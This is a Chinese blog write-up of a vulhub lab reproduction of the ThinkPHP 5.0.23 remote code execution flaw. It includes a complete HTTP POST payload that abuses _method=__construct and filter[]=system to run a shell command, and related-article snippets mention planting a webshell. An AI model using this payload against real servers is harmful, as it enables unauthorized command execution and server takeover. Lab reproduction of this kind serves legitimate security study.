ThinkPHP5 5.0.23远程执行代码漏洞 ThinkPHP5-RCE

最新推荐文章于 2024-09-08 22:05:37 发布
最新推荐文章于 2024-09-08 22:05:37 发布
阅读量840 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/113869852
版权
本文详细介绍了ThinkPHP5.0版本的一个严重安全漏洞,该漏洞允许攻击者通过特定的payload进行远程代码执行。利用流程包括burpuite抓包、修改payload并重放,最终导致代码执行且有回显。漏洞存在于请求方法的不当处理,影响版本为5.0(低于5.0.24)。提供了复现漏洞的payload,以及参考资料链接,帮助读者理解漏洞细节。
摘要由CSDN通过智能技术生成

ThinkPHP5 5.0.23远程执行代码漏洞

by ADummy

0x00利用路线

​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显

0x01漏洞介绍

​ ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.0.24)中,框架在获取请求方法时会错误地对其进行处理,这使攻击者可以调用Request类的任何方法,从而通过特定的利用链导致RCE漏洞。

0x02漏洞复现

payload1:

POST /index.php?s=captcha HTTP/1.1

Host: 192.168.15.130:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=1v1yqdlc1zren12n0cs4wcfwgp; PHPSESSID=1bb9e7bee96c5ec0fe76b552020c8719

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

默认页面
在这里插入图片描述

burpsuite改包,id被执行,有回显
在这里插入图片描述

0x03参考资料

https://blog.csdn.net/nicesa/article/details/106247668

ADummy_
关注
专栏目录
[ vulhub漏洞现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2348
[ vulhub漏洞现篇 ] ThinkPHP 5.0.23-Rce 漏洞ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5 5.0.23远程代码执行漏洞
weixin_67813445的博客
03-14 460
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
记录一次vulhub:ThinkPHP5 5.0.23远程代码执行漏洞
sszsNo1的博客
06-26 340
现vulhub:ThinkPHP5 5.0.23远程代码执行漏洞
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1884
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5 5.0.23-rce远程代码执行漏洞
最新发布
qq_45079558的博客
09-08 310
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
ThinkPHP5 5.0.23 远程代码执行漏洞
EC_Carrot的博客
08-17 385
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞现 发送如下数据包即可执行id命令: POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3575
thinkphp v5.0.23 rce 现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP5 5.0.23远程代码执行漏洞
weixin_51641247的博客
03-16 568
漏洞介绍ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 805
vulhub thinkphp5 5.0.23 远程代码执行漏洞
网络安全深入学习第二课——热门框架漏洞RCEThinkphp5.0.23 代码执行
p36273的博客
09-16 1591
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
Thinkphp5.0.23远程代码执行漏洞
hovcfuti的博客
10-13 357
漏洞简介Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响版本漏洞现在vulhub里面拉取靶场访问可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好请求文件:/index.php?
thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
weixin_39618169的博客
11-25 202
漏洞描述ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞环境使用vulhub的环境进行搭建docker-compose up -dhttps://github.com/vulhub/vulhub漏洞现抓包成功执行命令数据包"...
ThinkPHP 5.0.5~5.0.23 远程代码执行漏洞现及排查
dayouzi的博客
08-11 1689
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。
Thiinkphp 5.0.23-rce 漏洞现(vulhub)
MDSEC的博客
08-22 347
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞现完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值